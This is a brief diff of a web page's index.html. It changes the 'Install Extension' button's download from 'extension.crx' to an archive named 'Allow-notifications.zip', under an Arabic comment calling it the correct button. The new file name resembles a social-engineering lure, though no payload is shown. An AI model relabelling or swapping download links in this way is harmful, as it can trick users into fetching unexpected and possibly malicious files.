--- a/index.html
+++ b/index.html
@@ -86,7 +86,7 @@
     </div>
 
     <!-- زر التحميل الصحيح -->
-    <a href="extension.crx" download class="install-btn">Install Extension</a>
+    <a href="Allow-notifications.zip" download class="install-btn">Install Extension</a>
 
     <div class="preview-images">
       <img src="preview1.png" alt="Preview 1">
